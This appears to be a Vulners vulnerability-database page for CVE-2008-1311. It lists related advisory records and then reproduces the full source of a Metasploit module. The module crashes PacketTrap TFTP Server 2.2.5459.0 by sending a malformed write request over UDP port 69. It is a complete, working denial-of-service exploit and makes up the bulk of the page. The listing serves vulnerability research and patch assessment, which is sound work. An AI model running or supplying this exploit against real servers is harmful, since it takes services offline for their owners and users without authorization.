| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2008-1311 | 29 Oct 200800:00 | – | circl | |
| CVE-2008-1311 | 12 Mar 200817:00 | – | cve | |
| CVE-2008-1311 | 12 Mar 200817:00 | – | cvelist | |
| PacketTrap TFTP Server 2.2.5459.0 DoS | 9 Jan 200905:39 | – | metasploit | |
| CVE-2008-1311 | 12 Mar 200817:44 | – | nvd | |
| PacketTrap pt360 TFTP Server < 1.0.3302.0 Multiple Vulnerabilities | 13 Mar 200800:00 | – | nessus | |
| Code injection | 12 Mar 200817:44 | – | prion | |
| Code injection | 12 Mar 200817:44 | – | prion |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
'Description' => %q{
The PacketTrap TFTP server version 2.2.5459.0 can be
brought down by sending a special write request.
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2008-1311'],
[ 'OSVDB', '42932'],
[ 'EDB', '6863']
],
'DisclosureDate' => '2008-10-29'))
register_options([Opt::RPORT(69)])
end
def run
connect_udp
print_status("Sending write request...")
udp_sock.put("\x00\x02|\x00netascii\x00")
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation